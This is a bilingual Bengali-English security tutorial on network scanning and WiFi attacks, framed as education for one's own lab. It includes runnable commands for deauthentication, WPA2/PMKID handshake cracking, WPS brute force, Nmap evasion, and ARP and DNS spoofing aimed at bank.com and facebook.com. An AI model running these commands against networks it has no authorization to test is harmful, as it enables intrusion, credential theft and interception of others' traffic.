📡

// Cyber Security Series — Network //

Network Scanning

& WiFi Security

সম্পূর্ণ বাংলা গাইডComplete Guide

Network কীভাবে কাজ করে সেটা বোঝা থেকে শুরু করে — Nmap দিয়ে professional scanning, Wireshark দিয়ে packet analysis, এবং WiFi security assessment (WPA2, WPS vulnerabilities) — সব কিছু authorized lab environment-এর জন্য। From understanding how networks work — professional scanning with Nmap, packet analysis with Wireshark, and WiFi security assessment (WPA2, WPS vulnerabilities) — everything for authorized lab environments.

root@kali:~# nmap -sV -A 192.168.1.0/24

Starting Nmap 7.94 ( https://nmap.org )

Nmap scan report for 192.168.1.1

PORT STATE SERVICE VERSION

22/tcp open ssh OpenSSH 8.2

80/tcp open http Apache 2.4.41

🌐 TCP/IP Basics 🔍 Nmap Mastery 📦 Packet Analysis 🦈 Wireshark 📡 WiFi Protocols 🔒 WPA2 Security ⚡ Aircrack-ng Suite 🛡️ WiFi Defense 📋 Cheat Sheet

// বিষয়সূচিTable of Contents //

Network Scanning & WiFi Security — Complete Guide

Network FundamentalsNetwork Fundamentals

TCP/IP, OSI Model, IP/MAC, Ports, Protocols — মূল ধারণাcore concepts

THEORY

Network DiscoveryNetwork Discovery

ping, arp-scan, netdiscover — live hosts খোঁজাfinding live hosts

DISCOVER

Nmap — সম্পূর্ণ গাইডComplete Guide

Scan types, NSE scripts, OS detection, output — সব কিছুScan types, NSE scripts, OS detection, output — everything

NMAP

Packet Capture ও AnalysisPacket Capture & Analysis

tcpdump, Wireshark — network traffic পড়া ও বিশ্লেষণreading and analyzing network traffic

PACKETS

Service EnumerationService Enumeration

SMB, FTP, SSH, HTTP, SNMP — service থেকে তথ্য বের করাextracting information from services

ENUM

WiFi Protocol ও SecurityWiFi Protocol & Security

802.11, WEP, WPA, WPA2, WPA3 — কীভাবে কাজ করেhow they work

WIFI

WiFi ReconnaissanceWiFi Reconnaissance

Monitor mode, airodump-ng, kismet — wireless network scanningwireless network scanning

RECON

WPA2 Handshake Capture ও CrackWPA2 Handshake Capture & Crack

aircrack-ng, hashcat — নিজের network test করাtesting your own network

WPA2

WPS ও অন্যান্য WiFi VulnerabilitiesWPS & Other WiFi Vulnerabilities

Reaver, Bully, PMKID attack, Evil Twin — পরিচিতিintroduction

VULN

Network Attack TechniquesNetwork Attack Techniques

ARP Spoofing, DNS Spoofing, MITM — কীভাবে কাজ করেhow they work

ATTACKS

Network ও WiFi DefenseNetwork & WiFi Defense

নিজের নেটওয়ার্ক সুরক্ষিত করার সম্পূর্ণ গাইডComplete guide to securing your network

DEFENSE

Cheat Sheet — সম্পূর্ণ রেফারেন্সCheat Sheet — Complete Reference

Nmap, tcpdump, aircrack-ng, Wireshark filters — সব কমান্ডall commands

CHEAT

CHAPTER 01

🌐 Network FundamentalsNetwork Fundamentals

TCP/IP, OSI Model, IP address, Ports — scanning বোঝার আগে network বুঝতে হবেTCP/IP, OSI Model, IP address, Ports — must understand networking before scanning

OSI Model — ৭ LayerOSI Model — 7 Layers

Layer	নামName	Protocol	Hacking RelevanceHacking Relevance
7	Application	HTTP, FTP, DNS, SSH	Web attacks, SQLi, XSS
6	Presentation	SSL/TLS, JPEG, ASCII	SSL stripping
5	Session	NetBIOS, RPC	Session hijacking
4	Transport	TCP, UDP	Port scanning, DoS
3	Network	IP, ICMP, OSPF	IP spoofing, routing
2	Data Link	Ethernet, ARP, MAC	ARP spoofing, MITM
1	Physical	Cable, WiFi, Fiber	Physical tap, WiFi attack

TCP vs UDPTCP vs UDP

TCP — নির্ভরযোগ্যReliable

3-way handshake (SYN → SYN-ACK → ACK) করে connection establish করে। প্রতিটা packet-এর delivery নিশ্চিত করে। HTTP, SSH, FTP ব্যবহার করে।Establishes connection via 3-way handshake (SYN → SYN-ACK → ACK). Guarantees delivery of every packet. Used by HTTP, SSH, FTP.

Client ──SYN──► Server Client ◄─SYN-ACK─ Server Client ──ACK──► Server Connection Established!

UDP — দ্রুত কিন্তু অনির্ভরযোগ্যFast but Unreliable

Handshake নেই — সরাসরি পাঠিয়ে দেয়। Packet হারিয়ে গেলে জানে না। DNS, DHCP, Video streaming ব্যবহার করে।No handshake — sends directly. Doesn't know if packets are lost. Used by DNS, DHCP, video streaming.

Client ──DATA──► Server Client ──DATA──► Server (No acknowledgment)

IP Addressing ও SubnettingIP Addressing & Subnetting

# IP Address Classes Class A: 1.0.0.0 – 126.255.255.255 (Large networks) Class B: 128.0.0.0 – 191.255.255.255 (Medium networks) Class C: 192.0.0.0 – 223.255.255.255 (Small networks) # Private IP ranges (LAN এ থাকে) 10.0.0.0 – 10.255.255.255 (10.0.0.0/8) 172.16.0.0 – 172.31.255.255 (172.16.0.0/12) 192.168.0.0 – 192.168.255.255 (192.168.0.0/16) # CIDR Notation 192.168.1.0/24 → 256 IPs (192.168.1.0 – 192.168.1.255) 192.168.1.0/25 → 128 IPs 10.0.0.0/8 → 16M+ IPs # Network info বের করা $ ip addr show # Linux IP info $ ip route # Routing table $ cat /etc/resolv.conf # DNS servers $ arp -n # ARP table

গুরুত্বপূর্ণ Ports মনে রাখাRemembering Important Ports

সাধারণ ServicesCommon Services

21 → FTP
22 → SSH
23 → Telnet
25 → SMTP
53 → DNS
80 → HTTP
443 → HTTPS

Database ServicesDatabase Services

1433 → MSSQL
1521 → Oracle
3306 → MySQL
5432 → PostgreSQL
6379 → Redis
27017→ MongoDB

Windows/AD

88 → Kerberos
135 → RPC
139 → NetBIOS
389 → LDAP
445 → SMB
3389→ RDP
5985→ WinRM

CHAPTER 02

🔦 Network Discovery — Live Hosts খোঁজাNetwork Discovery — Finding Live Hosts

Network-এ কোন কোন device চলছে সেটা বের করার কৌশলTechniques for finding which devices are active on the network

ICMP Ping — সবচেয়ে সরলICMP Ping — The Simplest Method

# Single host ping $ ping 192.168.1.1 $ ping -c 4 192.168.1.1 # 4 packet পাঠাও $ ping -i 0.2 192.168.1.1 # Fast ping # Ping sweep — bash loop দিয়ে $ for i in {1..254}; do ping -c 1 -W 1 192.168.1.$i | grep "bytes from" & done # fping — একসাথে অনেক host $ fping -a -g 192.168.1.0/24 2>/dev/null # alive hosts শুধু $ fping -a -g 10.0.0.0/24 -r 1 # 1 retry

ARP Scan — Local Network-এ সবচেয়ে নির্ভরযোগ্যARP Scan — Most Reliable on Local Network

# arp-scan $ arp-scan --localnet $ arp-scan -I eth0 192.168.1.0/24 $ arp-scan --localnet | grep -v "DUP\|Unknown" # netdiscover $ netdiscover -r 192.168.1.0/24 $ netdiscover -i eth0 -r 192.168.1.0/24 -P # Passive mode # arping $ arping -c 3 192.168.1.1 # Nmap দিয়ে host discovery (no port scan) $ nmap -sn 192.168.1.0/24 # Ping scan only $ nmap -sn -PR 192.168.1.0/24 # ARP ping $ nmap -sP 192.168.1.0/24 # Same as -sn (older syntax)

Network Information GatheringNetwork Information Gathering

# DNS Lookup $ nslookup target.com $ dig target.com A $ dig target.com MX $ dig -x 192.168.1.1 # Reverse DNS $ host target.com # Traceroute — network path দেখা $ traceroute target.com $ traceroute -T target.com # TCP traceroute $ mtr target.com # Live traceroute # Network interfaces $ ip link show $ ifconfig -a $ ip neigh show # ARP cache (neighbors)

CHAPTER 03

🗺️ Nmap — সম্পূর্ণ গাইডComplete Guide

Network Mapper — পৃথিবীর সবচেয়ে বেশি ব্যবহৃত port scanner, সম্পূর্ণ বিস্তারিতNetwork Mapper — the world's most widely used port scanner, in complete detail

Nmap Scan TypesNmap Scan Types

Flag	Scan TypeScan Type	কীভাবে কাজ করেHow it Works	কখন ব্যবহার করবেWhen to Use
`-sS`	SYN Stealth	SYN পাঠায়, SYN-ACK পেলে RST পাঠায়Sends SYN, sends RST on SYN-ACK	DEFAULT (root)
`-sT`	TCP Connect	Full 3-way handshakeFull 3-way handshake	Non-root user
`-sU`	UDP Scan	UDP packet পাঠায়Sends UDP packets	DNS, SNMP, DHCP
`-sA`	ACK Scan	Firewall rules detect করেDetects firewall rules	Firewall mapping
`-sN`	NULL Scan	কোনো flag নেইNo flags set	IDS evasion
`-sn`	Ping Scan	Port scan ছাড়া host discoveryHost discovery without port scan	Quick discovery

Nmap সম্পূর্ণ ব্যবহারNmap Complete Usage

# ── TARGET SPECIFICATION ── $ nmap 192.168.1.1 # Single IP $ nmap 192.168.1.1-254 # IP range $ nmap 192.168.1.0/24 # CIDR $ nmap -iL targets.txt # File থেকে $ nmap target.com # Domain # ── PORT SPECIFICATION ── $ nmap -p 80 IP # Single port $ nmap -p 80,443,8080 IP # Multiple ports $ nmap -p 1-1000 IP # Port range $ nmap -p- IP # All 65535 ports $ nmap --top-ports 100 IP # Top 100 common ports # ── SERVICE & OS DETECTION ── $ nmap -sV IP # Service version $ nmap -sV --version-intensity 9 IP # Aggressive version $ nmap -O IP # OS detection $ nmap -A IP # All: OS+Version+Scripts+Traceroute # ── TIMING TEMPLATES ── $ nmap -T0 IP # Paranoid (IDS evasion) $ nmap -T1 IP # Sneaky $ nmap -T2 IP # Polite $ nmap -T3 IP # Normal (default) $ nmap -T4 IP # Aggressive (fast) $ nmap -T5 IP # Insane (fastest) # ── OUTPUT ── $ nmap -oN output.txt IP # Normal text $ nmap -oX output.xml IP # XML $ nmap -oG output.gnmap IP # Grepable $ nmap -oA output IP # All 3 formats $ nmap -v IP # Verbose $ nmap -vv IP # More verbose

NSE Scripts — সবচেয়ে শক্তিশালী FeatureNSE Scripts — The Most Powerful Feature

# Script Categories $ nmap --script vuln IP # Vulnerability scan $ nmap --script safe IP # Safe scripts $ nmap --script default IP # Default scripts $ nmap --script discovery IP # Discovery # Specific scripts $ nmap --script http-enum IP # Web directory enum $ nmap --script http-title IP # Web page title $ nmap --script smb-vuln-* IP # SMB vulnerabilities $ nmap --script smb-enum-shares IP # SMB shares $ nmap --script ftp-anon IP # Anonymous FTP $ nmap --script ssh-hostkey IP # SSH host key $ nmap --script dns-zone-transfer IP # DNS zone transfer $ nmap --script ssl-cert IP # SSL certificate info $ nmap --script banner IP # Service banners # Evasion techniques $ nmap -D RND:10 IP # Decoy scan $ nmap -f IP # Fragment packets $ nmap --source-port 53 IP # Source port spoof $ nmap --data-length 200 IP # Random data $ nmap --randomize-hosts IP # Random order

Practical Scan ExamplesPractical Scan Examples

# Quick network survey $ nmap -sn 192.168.1.0/24 -oN hosts.txt # Comprehensive single target scan $ nmap -sV -sC -O -p- --min-rate=1000 -T4 TARGET_IP -oA full_scan # Fast top ports scan $ nmap -sV --top-ports 1000 -T4 TARGET_IP # Vulnerability assessment $ nmap -sV --script vuln TARGET_IP # EternalBlue check (MS17-010) $ nmap --script smb-vuln-ms17-010 -p 445 TARGET_IP # Web application discovery $ nmap -p 80,443,8080,8443 --script http-enum,http-title,http-methods TARGET_IP

CHAPTER 04

📦 Packet Capture ও AnalysisPacket Capture & Analysis

tcpdump ও Wireshark দিয়ে network traffic দেখা ও বিশ্লেষণ করাViewing and analyzing network traffic with tcpdump and Wireshark

tcpdump — Command Line Packet Capturetcpdump — Command Line Packet Capture

# Basic capture $ tcpdump -i eth0 # eth0 এ capture $ tcpdump -i any # সব interface $ tcpdump -i eth0 -w capture.pcap # File-এ save $ tcpdump -r capture.pcap # File পড়া $ tcpdump -i eth0 -c 100 # 100 packet capture $ tcpdump -i eth0 -n # No DNS resolution # Filters $ tcpdump -i eth0 host 192.168.1.1 # Specific IP $ tcpdump -i eth0 port 80 # Specific port $ tcpdump -i eth0 tcp # TCP only $ tcpdump -i eth0 udp # UDP only $ tcpdump -i eth0 icmp # ICMP only $ tcpdump -i eth0 'port 80 and host 192.168.1.1' # Security-specific captures $ tcpdump -i eth0 -A port 80 # HTTP content (ASCII) $ tcpdump -i eth0 -A 'port 21' # FTP credentials! $ tcpdump -i eth0 -A 'port 23' # Telnet credentials! $ tcpdump -i eth0 'tcp[tcpflags] = tcp-syn' # SYN scan detect

Wireshark — GUI Packet AnalyzerWireshark — GUI Packet Analyzer

# Wireshark Display Filters (GUI-তে Filter bar-এ লিখবে) # Protocol filters http # HTTP traffic dns # DNS queries ftp # FTP ssh # SSH tcp # All TCP udp # All UDP icmp # ICMP/Ping arp # ARP packets # IP filters ip.addr == 192.168.1.1 # Specific IP ip.src == 192.168.1.100 # Source IP ip.dst == 192.168.1.1 # Destination IP # Port filters tcp.port == 80 # TCP port 80 tcp.dstport == 443 # HTTPS tcp.flags.syn == 1 # SYN packets tcp.flags.reset == 1 # RST (closed port) # Content filters http.request.method == "POST" # POST requests http contains "password" # Password in HTTP dns.qry.name contains "google" # DNS query # Combined http.request and ip.src == 192.168.1.5 tcp.port == 80 and ip.addr == 10.0.0.1

💡 Wireshark দিয়ে Credential খোঁজাFinding Credentials with Wireshark

HTTP, FTP, Telnet-এ credentials plaintext-এ পাঠানো হয়। Wireshark-এ http.request.method == "POST" filter দিলে login form submissions দেখা যায়। এটাই দেখায় কেন HTTPS, SFTP ও SSH ব্যবহার করা উচিত।HTTP, FTP, and Telnet send credentials in plaintext. Using the filter http.request.method == "POST" in Wireshark reveals login form submissions. This is exactly why you should use HTTPS, SFTP, and SSH.

CHAPTER 05

🔎 Service EnumerationService Enumeration

Open port খোঁজার পর — প্রতিটা service থেকে কীভাবে তথ্য বের করতে হয়After finding open ports — how to extract information from each service

SMB Enumeration (Port 445)SMB Enumeration (Port 445)

$ enum4linux -a TARGET_IP $ enum4linux-ng -A TARGET_IP $ smbclient -L //TARGET_IP -N # Share list (anonymous) $ smbclient -L //TARGET_IP -U user # With credentials $ smbclient //TARGET_IP/share -N # Connect to share $ smbmap -H TARGET_IP $ smbmap -H TARGET_IP -u user -p pass # Nmap SMB scripts $ nmap --script smb-enum-shares,smb-enum-users,smb-os-discovery -p 445 TARGET_IP $ nmap --script smb-vuln-ms17-010 -p 445 TARGET_IP # EternalBlue

HTTP/HTTPS Enumeration (Port 80/443)HTTP/HTTPS Enumeration (Port 80/443)

# Technology detection $ whatweb http://TARGET_IP $ wafw00f http://TARGET_IP # WAF detection $ curl -I http://TARGET_IP # HTTP headers # Directory brute force $ gobuster dir -u http://TARGET_IP -w /usr/share/wordlists/dirb/common.txt $ gobuster dir -u http://TARGET_IP -w /usr/share/seclists/Discovery/Web-Content/raft-medium-directories.txt $ ffuf -w wordlist.txt -u http://TARGET_IP/FUZZ -mc 200,301,302 # Web vulnerability scanner $ nikto -h http://TARGET_IP

SSH, FTP, SNMP EnumerationSSH, FTP, SNMP Enumeration

# SSH (Port 22) $ ssh-audit TARGET_IP # Algorithm & weakness check $ nmap --script ssh-hostkey -p 22 TARGET_IP # FTP (Port 21) — Anonymous login check $ ftp TARGET_IP # Username: anonymous, Password: (blank or email) $ nmap --script ftp-anon,ftp-bounce -p 21 TARGET_IP # SNMP (Port 161/UDP) $ snmpwalk -c public -v1 TARGET_IP $ snmpwalk -c public -v2c TARGET_IP $ onesixtyone -c community.txt TARGET_IP $ nmap -sU -p 161 --script snmp-info TARGET_IP

CHAPTER 06

📶 WiFi Protocol ও Security StandardsWiFi Protocol & Security Standards

802.11, WEP, WPA, WPA2, WPA3 — WiFi কীভাবে কাজ করে এবং কোনটায় কী দুর্বলতা802.11, WEP, WPA, WPA2, WPA3 — how WiFi works and what vulnerabilities each has

WiFi Security EvolutionWiFi Security Evolution

Standard	বছরYear	Encryption	নিরাপত্তাSecurity	দুর্বলতাVulnerability
WEP	1997	RC4	BROKEN	মিনিটে crack হয়Cracked in minutes
WPA	2003	TKIP	WEAK	TKIP vulnerabilities
WPA2	2004	AES-CCMP	MEDIUM	Weak password, PMKID, KRACKWeak password, PMKID, KRACK
WPA3	2018	SAE (Dragonfly)	STRONG	DragonBlood (patched)

WPA2 Authentication — কীভাবে কাজ করে?WPA2 Authentication — How Does It Work?

WPA2 4-Way Handshake:WPA2 4-Way Handshake: Client (Station) Access Point (AP) │ │ │◄──── Message 1: ANonce ───────────────│ │ (AP sends random number) │ │ │ │──── Message 2: SNonce + MIC ─────────►│ │ (Client sends its random + hash) │ │ │ │◄──── Message 3: GTK + MIC ────────────│ │ (AP confirms session key) │ │ │ │──── Message 4: ACK ──────────────────►│ │ (Client confirms) │ │ │ └══════ Encrypted Communication ════════┘ Attacker: Message 2 ধরলেই offline crack করা যায়! Password hash = PBKDF2(password, SSID, 4096 iterations)

WiFi Bands ও ChannelWiFi Bands & Channels

2.4 GHz Band

Channel 1, 6, 11 — overlap নেইChannels 1, 6, 11 — no overlap
Range বেশি কিন্তু slowLonger range but slower
Wall ভেদ করতে পারেCan penetrate walls
802.11b/g/n

5 GHz Band

২৩টি non-overlapping channel23 non-overlapping channels
দ্রুত কিন্তু range কমFaster but shorter range
কম interferenceLess interference
802.11a/n/ac/ax

CHAPTER 07

🔭 WiFi ReconnaissanceWiFi Reconnaissance

Monitor mode, airodump-ng দিয়ে wireless network scanning — সব কিছু দেখার কৌশলWireless network scanning with monitor mode and airodump-ng — techniques for seeing everything

⚖️ আইনগত সতর্কতাLegal Warning

WiFi scanning শুধুমাত্র নিজের network বা লিখিত অনুমতি নিয়ে করতে হবে। অন্যের WiFi-তে unauthorized access বাংলাদেশের Digital Security Act এবং আন্তর্জাতিক আইনে অপরাধ। সব practice নিজের home lab বা dedicated test network-এ করো।WiFi scanning must only be done on your own network or with written permission. Unauthorized access to others' WiFi is a crime under Bangladesh's Digital Security Act and international law. Do all practice in your own home lab or a dedicated test network.

Monitor Mode চালু করাEnabling Monitor Mode

# Compatible adapter check $ iwconfig # Wireless interfaces দেখো $ iw list | grep "Supported interface modes" -A 10 # Monitor mode support # Method 1: airmon-ng (recommended) $ airmon-ng check kill # Interfering processes বন্ধ $ airmon-ng start wlan0 # Monitor mode চালু # Interface: wlan0 → wlan0mon $ airmon-ng stop wlan0mon # Monitor mode বন্ধ # Method 2: iw command $ ip link set wlan0 down $ iw dev wlan0 set type monitor $ ip link set wlan0 up # Verify monitor mode $ iwconfig wlan0mon

airodump-ng — Wireless Network Scannerairodump-ng — Wireless Network Scanner

# Basic scan — সব নেটওয়ার্ক দেখো $ airodump-ng wlan0mon # Output explanation: # BSSID = AP-এর MAC address # PWR = Signal strength (higher = closer) # Beacons = Broadcast count # #Data = Data frames # CH = Channel # ENC = Encryption type # CIPHER = Cipher (CCMP, TKIP) # AUTH = Authentication (PSK, MGT) # ESSID = Network name # Specific network focus $ airodump-ng wlan0mon --bssid AP_MAC --channel 6 # Capture packets to file $ airodump-ng wlan0mon --bssid AP_MAC --channel 6 -w capture # 5 GHz band $ airodump-ng wlan0mon --band a $ airodump-ng wlan0mon --band abg # Both bands # Kismet — Advanced wireless scanner $ kismet -c wlan0mon

CHAPTER 08

🔐 WPA2 Handshake Capture ও CrackWPA2 Handshake Capture & Crack

নিজের WPA2 network-এর password strength test করা — authorized testing onlyTesting the password strength of your own WPA2 network — authorized testing only

⚠️ শুধুমাত্র নিজের নেটওয়ার্কে!Your Own Network Only!

এই chapter-এর সব কিছু শুধুমাত্র নিজের WiFi বা dedicated lab-এ test করার জন্য। এটা দেখায় কেন তোমার router-এ strong password রাখা দরকার।Everything in this chapter is only for testing your own WiFi or a dedicated lab. It shows why you need a strong password on your router.

Handshake Capture করাCapturing the Handshake

# Step 1: Monitor mode চালু $ airmon-ng check kill $ airmon-ng start wlan0 # Step 2: Target network খোঁজো $ airodump-ng wlan0mon # Note: BSSID (AP MAC), Channel, ESSID # Step 3: Specific channel-এ capture শুরু করো $ airodump-ng --bssid TARGET_BSSID --channel TARGET_CH -w handshake wlan0mon # Step 4: (অন্য terminal-এ) Deauth — client reconnect করাও $ aireplay-ng --deauth 10 -a TARGET_BSSID wlan0mon # -deauth 10 = 10 deauth packet পাঠাও # উপরের window-এ "WPA handshake: XX:XX:XX" দেখালে success! # Handshake verify করা $ aircrack-ng handshake-01.cap

Aircrack-ng দিয়ে Crack করাCracking with Aircrack-ng

# Dictionary attack $ aircrack-ng handshake-01.cap -w /usr/share/wordlists/rockyou.txt $ aircrack-ng handshake-01.cap -w custom_wordlist.txt -e ESSID # Hashcat দিয়ে (অনেক দ্রুত — GPU ব্যবহার করে) # Step 1: .cap → .hc22000 convert $ hcxtools handshake-01.cap -o hash.hc22000 # অথবা: $ hcxdumptool -i wlan0mon -o capture.pcapng --enable_status=1 # Step 2: Hashcat crack $ hashcat -m 22000 hash.hc22000 /usr/share/wordlists/rockyou.txt $ hashcat -m 22000 hash.hc22000 rockyou.txt -r best64.rule $ hashcat -m 22000 hash.hc22000 -a 3 ?d?d?d?d?d?d?d?d # 8-digit numbers # PMKID Attack (client ছাড়াই!) $ hcxdumptool -i wlan0mon -o pmkid.pcapng --enable_status=1 --filtermode=2 $ hcxpcapngtool pmkid.pcapng -o hash.hc22000 $ hashcat -m 22000 hash.hc22000 rockyou.txt

// Password কতক্ষণে crack হয়?How Long Does It Take to Crack a Password? //

🔴 "password", "12345678", "bangladesh" → মিনিটের মধ্যে"password", "12345678", "bangladesh" → within minutes
🟡 Dictionary word + numbers (admin123) → ঘণ্টার মধ্যেDictionary word + numbers (admin123) → within hours
🟢 Random 12+ chars (K#9mP@2Lq!v) → বছর বা অসম্ভবRandom 12+ chars (K#9mP@2Lq!v) → years or impossible
💡 WPA3 ব্যবহার করো — offline crack প্রতিরোধ করেUse WPA3 — it prevents offline cracking

CHAPTER 09

📌 WPS ও অন্যান্য WiFi VulnerabilitiesWPS & Other WiFi Vulnerabilities

WPS PIN attack, Pixie Dust, Evil Twin — WiFi-র অন্যান্য দুর্বলতার পরিচিতিWPS PIN attack, Pixie Dust, Evil Twin — introduction to other WiFi vulnerabilities

WPS — WiFi Protected Setup দুর্বলতাWPS — WiFi Protected Setup Vulnerability

WPS হলো router-এ easy connection-এর জন্য একটি feature। কিন্তু এর 8-digit PIN system-এ fundamental design flaw আছে — শুধু 11,000 combination try করেই crack করা যায়।WPS is a feature for easy router connections. But its 8-digit PIN system has a fundamental design flaw — it can be cracked by trying only 11,000 combinations.

# WPS enabled networks খোঁজা $ wash -i wlan0mon # WPS-enabled APs scan $ airodump-ng wlan0mon --wps # WPS info দেখো # Reaver — WPS PIN brute force (নিজের router-এ test) $ reaver -i wlan0mon -b TARGET_BSSID -vv $ reaver -i wlan0mon -b TARGET_BSSID -vv -N # No association # Pixie Dust Attack — দ্রুততর (seconds-এ) $ reaver -i wlan0mon -b TARGET_BSSID -vv -K 1 $ bully wlan0mon -b TARGET_BSSID -d -v 3

Evil Twin Attack — কীভাবে কাজ করে (Theory)Evil Twin Attack — How It Works (Theory)

Evil Twin Attack Flow: 1. Attacker target AP-এর same SSID দিয়ে fake AP তৈরি করে 2. Attacker real AP-তে deauth attack পাঠায় 3. Victim disconnect হয়ে fake AP-তে connect করে 4. Fake AP captive portal দেখায় "WiFi password re-enter করুন" 5. Victim password দেয় → Attacker পেয়ে যায় Tools: airbase-ng, hostapd-wpe, wifiphisher Note: এটা Social Engineering — technical bypass নয়

🔍 Evil Twin থেকে রক্ষা পাওয়ার উপায়How to Protect Against Evil Twin

VPN ব্যবহার করো — public WiFi-তে সবসময়Use a VPN — always on public WiFi
HTTPS-only sites ব্যবহার করোUse HTTPS-only sites
অচেনা network-এ password দিও নাNever enter passwords on unknown networks
WPA3 Enterprise ব্যবহার করো (certificate validation)Use WPA3 Enterprise (certificate validation)

CHAPTER 10

⚡ Network Attack TechniquesNetwork Attack Techniques

ARP Spoofing, DNS Spoofing, MITM — কীভাবে কাজ করে এবং কীভাবে রক্ষা পাওয়া যায়ARP Spoofing, DNS Spoofing, MITM — how they work and how to protect yourself

ARP Spoofing — MITM-এর মূলARP Spoofing — The Foundation of MITM

Normal ARP: PC (192.168.1.5) → "Router-এর MAC কে?" → Router জানায় ARP Spoofing: Attacker → PC: "আমিই Router (192.168.1.1)! আমার MAC: AA:BB:CC" Attacker → Router: "আমিই PC (192.168.1.5)! আমার MAC: AA:BB:CC" PC → (sends to Attacker thinking it's Router) → Router All traffic passes through Attacker! Tools: arpspoof, bettercap, ettercap

# ARP Spoofing (নিজের lab-এ test) $ echo 1 > /proc/sys/net/ipv4/ip_forward # Forwarding চালু $ arpspoof -i eth0 -t VICTIM_IP GATEWAY_IP $ arpspoof -i eth0 -t GATEWAY_IP VICTIM_IP # Bettercap — Modern MITM framework $ bettercap -iface eth0 » net.probe on » arp.spoof.targets VICTIM_IP » arp.spoof on » net.sniff on # ARP Spoofing detect করা $ arp -n # Duplicate MAC address দেখো $ arpwatch # ARP change monitor

DNS SpoofingDNS Spoofing

# dnsspoof (MITM-এর পরে) # /etc/hosts file-এ fake entries যোগ করো $ echo "192.168.1.100 bank.com" >> /tmp/fakehosts $ dnsspoof -f /tmp/fakehosts # Bettercap DNS spoofing » set dns.spoof.domains bank.com,facebook.com » set dns.spoof.address 192.168.1.100 » dns.spoof on

CHAPTER 11

🛡️ Network ও WiFi DefenseNetwork & WiFi Defense

নিজের network সুরক্ষিত করার সম্পূর্ণ গাইড — এখনই করোComplete guide to securing your own network — do it now

WiFi Router Security ChecklistWiFi Router Security Checklist

❌ এখনই ঠিক করোFix These Now

Default router password পরিবর্তন করো (admin/admin)Change default router password (admin/admin)
WEP বা WPA ব্যবহার করলে WPA2/WPA3-এ upgrade করোUpgrade from WEP or WPA to WPA2/WPA3
WPS সম্পূর্ণ বন্ধ করোCompletely disable WPS
Remote management বন্ধ করোDisable remote management
Firmware আপডেট করোUpdate firmware

✅ ভালো প্র্যাকটিসGood Practices

WPA3 ব্যবহার করো (সম্ভব হলে)Use WPA3 (if possible)
20+ character random WiFi password20+ character random WiFi password
Guest network আলাদা রাখোKeep guest network separate
SSID change করো (ISP default নয়)Change your SSID (not ISP default)
Connected devices regularly check করোRegularly check connected devices
VPN ব্যবহার করো public WiFi-তেUse a VPN on public WiFi

Network-Level DefenseNetwork-Level Defense

# Firewall (UFW) setup — Linux server $ ufw enable $ ufw default deny incoming $ ufw default allow outgoing $ ufw allow 22/tcp # SSH শুধু $ ufw allow 80/tcp # HTTP $ ufw allow 443/tcp # HTTPS $ ufw deny 23/tcp # Telnet block $ ufw status verbose # ARP Spoofing protection $ arp -s GATEWAY_IP GATEWAY_MAC # Static ARP entry # Router-এ Dynamic ARP Inspection (DAI) চালু করো # Nmap দিয়ে নিজের network scan করো $ nmap -sV -A 192.168.1.0/24 -oA home_network_audit # যে ports unexpected open আছে সেগুলো close করো

WiFi Password Strength TestWiFi Password Strength Test

# নিজের WiFi password কতটা strong সেটা test করো # Step 1: নিজের WiFi-এর handshake capture করো (ch8) # Step 2: rockyou.txt দিয়ে crack try করো $ aircrack-ng -w /usr/share/wordlists/rockyou.txt -b YOUR_BSSID handshake.cap # যদি crack হয় → password পরিবর্তন করো! # Strong password উদাহরণ: # Tr0ub4dor&3 (xkcd-style passphrase) ← এটাও মাঝারি # K#9mP@2Lq!vN7rTw (random 16-char) ← এটাই ভালো # Use password manager to generate!

CHAPTER 12

📋 Cheat Sheet — সম্পূর্ণ রেফারেন্সCheat Sheet — Complete Reference

Nmap, tcpdump, aircrack-ng, Wireshark filters — সব কমান্ড এক জায়গায়Nmap, tcpdump, aircrack-ng, Wireshark filters — all commands in one place

🗺️ Nmap Cheat Sheet

Scan Types

nmap -sS IPSYN Stealth (default)

nmap -sT IPTCP Connect

nmap -sU IPUDP scan

nmap -sV IPVersion detectVersion detect

nmap -A IPAggressive (all)Aggressive (all)

nmap -sn 192.168.1.0/24Ping scan onlyPing scan only

Ports & Output

nmap -p- IPAll 65535 ports

nmap -p 80,443 IPSpecific portsSpecific ports

nmap --top-ports 100 IPTop 100

nmap -oA output IPAll formats saveSave all formats

nmap -T4 IPFast timing

nmap --script vuln IPVuln scan

📦 tcpdump Cheat Sheet

Capture

tcpdump -i eth0Interface captureCapture on interface

tcpdump -i eth0 -w file.pcapFile-এ saveSave to file

tcpdump -r file.pcapFile পড়াRead file

tcpdump -i eth0 -nNo DNS lookup

tcpdump -i eth0 -A port 80HTTP content

Filters

tcpdump host IPSpecific IPSpecific IP

tcpdump port 443Specific portSpecific port

tcpdump tcpTCP only

tcpdump udpUDP only

tcpdump icmpICMP/Ping only

📡 Aircrack-ng Suite Cheat Sheet

Monitor & Scan

airmon-ng check killProcess বন্ধKill processes

airmon-ng start wlan0Monitor mode

airmon-ng stop wlan0monMonitor বন্ধStop monitor

airodump-ng wlan0monNetwork scanNetwork scan

wash -i wlan0monWPS scan

Capture & Crack

airodump-ng --bssid MAC -c CH -w cap wlan0monHandshake capture

aireplay-ng --deauth 10 -a BSSID wlan0monDeauth attack

aircrack-ng cap.cap -w wordlist.txtDictionary crack

hashcat -m 22000 hash.hc22000 wordlist.txtGPU crack

hcxtools cap.cap -o hash.hc22000Convert format

🦈 Wireshark Filter Cheat Sheet

Protocol FiltersProtocol Filters

httpHTTP traffic

dnsDNS queries

tcp.port == 22SSH

tcp.flags.syn == 1SYN packets

arpARP packets

icmpPing/ICMP

Content FiltersContent Filters

http.request.method == "POST"POST requests

http contains "password"Password খোঁজাFind password

ip.addr == 192.168.1.1IP filterIP filter

dns.qry.name contains "google"DNS query

wlan.fc.type_subtype == 0x08WiFi beacon

eapolWPA handshake

        $ nmap -sV --script vuln 192.168.1.0/24
      

        [+] Network scanning শেখা হলোNetwork scanning learned ✓

        [+] WiFi security বোঝা হলোWiFi security understood ✓

        [+] নিজের network রক্ষা করোProtect your own network ✓

সম্পূর্ণ শিক্ষামূলক উদ্দেশ্যে। শুধুমাত্র authorized environment-এ এবং নিজের নেটওয়ার্কে practice করো। Entirely educational. Practice only in authorized environments and on your own network.

v1.0 — Network Scanning & WiFi Security | Bilingual | 12 Chapters + Cheat Sheet